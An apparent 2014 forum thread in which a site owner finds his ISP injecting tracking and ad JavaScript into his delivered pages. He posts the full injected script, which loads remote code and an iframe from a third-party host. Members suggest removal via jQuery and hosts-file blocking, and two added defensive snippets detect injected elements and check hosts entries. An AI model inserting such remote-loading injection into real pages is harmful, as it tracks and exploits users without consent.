The Cache: Technology Expert's Forum
 
Author Topic: My New ISP is Hacking Me!  (Read 2164 times)
Bompa
Administrator
« on: July 27, 2014, 03:47:07 AM »

Yes, believe it or not.

I switched to a new ISP a few days ago, Globe Telecom in .PH and today while
uploading a page, I noticed some JS near the bottom of my page that I did not
put there. 

Code:
<!-- Layer8 version 2.0.0.107 --><script>if(top==window){var fn_selector_insertion_script="http://toolbar.mywebacceleration.com/tbpreload.js";runFnTbScript = function(){try{var tbInsertion = new FNH.TBInsertion();var tbData = "PFRCRGF0YT48VEJEYXRhSXRlbSBuYW1lPSJob3N0X3VybCIgdmFsdWU9Imh0dHA6Ly9jaW5kam9iLmNvbS8yMDAiID48L1RCRGF0YUl0ZW0+PFRCRGF0YUl0ZW0gbmFtZT0iaW5zZXJ0aW9uIiB2YWx1ZT0iaHR0cDovL3Rvb2xiYXIubXl3ZWJhY2NlbGVyYXRpb24uY29tL3NvdXJjZXMvaW5mcmEvanMvaW5zZXJ0aW9uX3BjLmpzIiBjb25maWd1cmF0aW9uPSJ0cnVlIiA+PC9UQkRhdGFJdGVtPjwvVEJEYXRhPg==";tbInsertion.parseTBData(tbData);var fnLayer8=tbInsertion.createIframeElement("fn_layer8", "http://toolbar.mywebacceleration.com/Globe/fakeToolbar.html");var owner;if(document.body){owner=document.body;}else{owner=document.documentElement;}var shouldAddDiv=tbInsertion.getAttributeFromTBData("div_wrapper");if(shouldAddDiv){var divWrpr=tbInsertion.createElement("div", "fn_wrapper_div");divWrpr.style.position="fixed";divWrpr.ontouchstart=function(){return true;};if (typeof fnLayer8 != "undefined")divWrpr.appendChild(fnLayer8);owner.appendChild(divWrpr);}else{if (typeof fnLayer8 != "undefined")owner.appendChild(fnLayer8);}var result=tbInsertion.getAttributeFromTBData("insertion");if(result){scriptLocation=result;}else{scriptLocation="http://toolbar.mywebacceleration.com/sources/infra/js/insertion_pc.js"}var fnd=document.createElement("script");fnd.setAttribute("src",scriptLocation);fnd.setAttribute("id","fn_toolbar_script");fnd.setAttribute("toolbardata",tbData);fnd.setAttribute("toolbarhash","ILHy2YbTvM5L0VS3ovK9SQ==");fnd.setAttribute("persdata","PFByaXZhdGVEYXRhPg0KPFByaXZhdGVJdGVtIGtleT0iY2xvc2VkIiB2YWx1ZT0iZmFsc2UiPg0KPC9Qcml2YXRlSXRlbT4NCjxQcml2YXRlSXRlbSBrZXk9Im1pbmltaXplZCIgdmFsdWU9ImZhbHNlIj4NCjwvUHJpdmF0ZUl0ZW0+DQo8UHJpdmF0ZUl0ZW0ga2V5PSJkZWZhdWx0UGVyc1ZhbHVlcyIgdmFsdWU9InRydWUiPg0KPC9Qcml2YXRlSXRlbT4NCjwvUHJpdmF0ZURhdGE+");document.body.appendChild(fnd);}catch(e){console.error("TB preload script failed: " + e);}};var 
fne=document.createElement("script");fne.setAttribute("src",fn_selector_insertion_script);fne.setAttribute("id","fn_selector_insertion_script");if(fne.addEventListener){fne.onload = runFnTbScript;}else {fne.onreadystatechange = function(){if ((this.readyState == "complete") || (this.readyState == "loaded")) runFnTbScript();}};if(document.head==null || document.head=="undefined" ){document.head = document.getElementsByTagName("head")[0];}document.head.appendChild(fne);};</script></body>

That is NOT in my code on my pc and it is NOT in my uploaded code.  It is only in my
browser's html source code.

So, my ISP is tracking my every move.  This might be in the agreement, but I was not shown
any agreement when I signed up.  Fairly outrageous, don't you agree?


I have read that JS can be used to remove JS and saw a post with an example:
Code:
<script>
$(function() {
$("#fn_layer8").remove();
});
</script>
http://thepoch.com/2013/globe-telecom-injecting-javascript-on-3g.html


That does not seem to make a difference.  Do I need to modify that?

Bomps

"The most beautiful and profound emotion we can experience is the sensation of the mystical..." - Albert Einstein
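An added example (not part of the thread): one way to confirm the in-transit modification described in the first post is to compare the active elements of the page as uploaded with the page as the browser received it. Both HTML samples are constructed, the received one abbreviated from the snippet posted above, and the function names are illustrative.

```javascript
// Constructed sample: the page as the author uploaded it.
const uploaded = `<html><head><script src="/js/site.js"></script></head>
<body><p>Hello</p></body></html>`;

// Constructed sample: the same page as received, with an abbreviated copy
// of the injected block from the post appended before </body>.
const received = `<html><head><script src="/js/site.js"></script></head>
<body><p>Hello</p>
<!-- Layer8 version 2.0.0.107 --><script>if(top==window){var fn_selector_insertion_script="http://toolbar.mywebacceleration.com/tbpreload.js";var fne=document.createElement("script");fne.setAttribute("src",fn_selector_insertion_script);document.head.appendChild(fne);};</script></body></html>`;

// Collect every <script> and <iframe> element as a whitespace-normalized string.
function activeElements(html) {
  const re = /<(script|iframe)\b[^>]*>[\s\S]*?<\/\1\s*>/gi;
  return (html.match(re) || []).map((el) => el.replace(/\s+/g, " ").trim());
}

// Absolute http(s) hostnames mentioned anywhere in a chunk of markup or script.
function hostsIn(text) {
  const found = new Set();
  for (const m of text.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    found.add(m[1].toLowerCase());
  }
  return [...found].sort();
}

// Elements present in the received copy but absent from the uploaded copy.
function findInjected(uploadedHtml, receivedHtml) {
  const known = new Set(activeElements(uploadedHtml));
  return activeElements(receivedHtml)
    .filter((el) => !known.has(el))
    .map((el) => ({ bytes: el.length, hosts: hostsIn(el), preview: el.slice(0, 60) }));
}

const report = findInjected(uploaded, received);
console.log(JSON.stringify(report, null, 2));
```

The hostnames reported for each unexpected element are the exact names a hosts-file or DNS block would need to list.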
Bompa
Administrator
« Reply #1 on: July 27, 2014, 04:32:31 AM »

As I see it, there are two issues here.

1. They are tracking ME literally. Not just my IP and browser sig, but I am sure
that the USB stick that I bought from them identifies itself. So, they can cross
reference that with my name, address, everything that I gave on the account
application.


2. There is an iframe in that JS that creates a large white space at the bottom
of my page.  It sucks. I think on mobile devices there is an ad there.

I have added these to my host file:
C:\WINDOWS\system32\drivers\etc\hosts

127.0.0.1    mywebacceleration.com
127.0.0.1    toolbar.webacceleration.com

However, when I check with wireshark, nothing is resolving to 127.0.0.1 so
that's not working, I think.

gees,
Bompa
Bompa
Administrator
« Reply #2 on: July 27, 2014, 05:55:28 AM »

Ok, my mistake, the hosts file IS working. I thought the domain names
were treated like regex, but they must be FQDNs. duh

The white space is gone and I am still testing, but I think they can
not track me now.
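An added example (not part of the thread): hosts-file lookups match the whole hostname exactly, with no wildcard or suffix matching, which is the point Reply #2 arrives at. The sketch below checks the entries posted in Reply #1 against the hostname the injected script loads from; the corrected file is constructed, since the thread does not show it, and the function names are illustrative.

```javascript
// Entries as posted in Reply #1.
const postedHosts = `
127.0.0.1    mywebacceleration.com
127.0.0.1    toolbar.webacceleration.com
`;

// Constructed correction: the exact FQDN used by the injected script.
const fixedHosts = postedHosts + "127.0.0.1    toolbar.mywebacceleration.com\n";

// Parse hosts-file text into a Map of lowercase hostname -> address.
function parseHosts(text) {
  const table = new Map();
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, "").trim(); // drop comments and blanks
    if (!line) continue;
    const [ip, ...names] = line.split(/\s+/);
    for (const n of names) {
      const key = n.toLowerCase().replace(/\.$/, "");
      if (!table.has(key)) table.set(key, ip); // keep the first mapping seen
    }
  }
  return table;
}

// For each wanted hostname, report whether an exact entry exists.
function checkCoverage(hostsText, wanted) {
  const table = parseHosts(hostsText);
  return wanted.map((name) => {
    const key = name.toLowerCase().replace(/\.$/, "");
    const ip = table.get(key) || null;
    // Parent-domain entries are listed only as a hint: they do not cover subdomains.
    const parentEntries = [...table.keys()].filter((k) => key.endsWith("." + k));
    return { name: key, blocked: ip !== null, ip, parentEntries };
  });
}

const target = ["toolbar.mywebacceleration.com"]; // hostname from the injected snippet
console.log(checkCoverage(postedHosts, target));
console.log(checkCoverage(fixedHosts, target));
```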

perkiset
Olde World Hacker
Administrator
« Reply #3 on: July 29, 2014, 10:16:20 AM »

PM me a URL or two, let me take a look at what the page looks like for me.

With the new advanced packet filters they could do such a thing quite easily ... if you are delivering a page they just jump in and add a little to the bottom. It's not tough, but pretty shitty.

Ya, probably right, it's probably in the agreement that they can use your page delivery for their own means. Actually, a kind of interesting business model ... and you'd not care if your clients were spammers, you could STILL add ad content to the bottom and it's THEIR domain not yours that would get spanked. Hmmm. Parasitic spamming, Host is the vehicle. Interesting.

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
taky
Rookie
« Reply #4 on: August 06, 2014, 12:44:10 AM »

pretty ambitious of your isp

toolbar.mywebacceleration.com/tbpreload.js doesn't resolve for me (us ip)

they are probably doing more than tracking you, probably injecting monetization into popular sites